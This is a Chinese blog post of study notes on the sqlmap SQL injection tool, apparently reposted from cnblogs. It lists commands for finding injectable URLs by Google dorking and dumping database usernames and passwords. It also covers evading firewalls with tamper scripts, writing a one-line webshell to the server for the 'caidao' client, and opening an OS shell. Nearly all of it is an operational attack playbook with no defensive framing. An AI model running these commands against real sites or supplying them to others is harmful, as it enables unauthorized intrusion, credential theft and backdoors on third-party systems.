对于sqlmap常用功能的学习

所有命令 只要是完整的单词 前面都是两个横杠(--tables --columns),如果是一个单词或者缩写前面都是一个横杠(-D -T -dbs)

1.access数据库注入

-u "指定一个url"

sqlmap -u "url"  直接回车判定是否是注入点

sqlmap -u "url" --tables 回车 根据access特点猜表名 他会去字典里面搜索表名

sqlmap -u "url" --columns -T 表名 设置线程数(一般为10),然后根据字典猜解列名,找到敏感名字(username password等)的时候ctlr+c退出

sqlmap -u "url" --dump -C username,password -T 表名 就能猜出username和password的内容

2.mysql数据库注入

sqlmap -u "url"判断是否为注入点,查看服务器系统

sqlmap -u "url" --is-dba 当前用户是否为管理员权限

sqlmap -u "url" --dbs 列出所有数据库

sqlmap -u "url" --current-db 当前数据库

sqlmap -u "url" --current-user 当前用户 --users 所有用户

sqlmap -u "url" --tables -D 数据库名

sqlmap -u "url" --columns -T 表名 -D 数据库名

sqlmap -u "url" --dump -C 列名 -T 表名 -D 数据库名

3.mssql数据库注入

和mysql数据库类似

4.cookie中转注入

sqlmap -u "url" --cookie="cookie"  level 2    等级1只能检测 get 和post

然后和常规注入相似

5.利用google批量搜索注入

-g 使用google 利用vpn翻墙

搜索引擎语法:inurl intext intitle site

sqlmap -g "inurl:php?eid=" 从谷歌搜索带有php?eid=的url

6.tamper插件使用

当可以注入但无回显的时候,就是有防火墙

sqlmap -u "url" --tamper "tamper文件中的脚本"

推荐与-v 3 --batch 一起使用

7.file参数的使用

必须要数据库管路员权限才能使用 (dba)

sqlmap -u "url"  --is-dba判断是否为dba权限

file-write "写入的文件"从本地写入(一句话木马之类的)把反斜杠改为斜杠

file-dest  “被写入的绝对路径”  该斜杠

sqlmap -u “url” --file-write "写入的文件" --file-dest  “被写入的绝对路径”

然后就可以使用菜刀连接

8.post提交方式的注入

forms 自动获取post包&&截取数据

r 从本地获取结果

sqlmap -u "url" --forms 获取post数据

sqlmap -r post.txt post.txt为本地文件

如果成功就可以进行注入了

9.os参数

cmd执行cmd命令

shell执行当前用户命令

sqlmap -u “url”  --os-cmd-ipconfig 执行ipconfig命令

sqlmap -u “url”  --os-shell 进入到shell

猜你喜欢

转载自www.cnblogs.com/noob199/p/12716261.html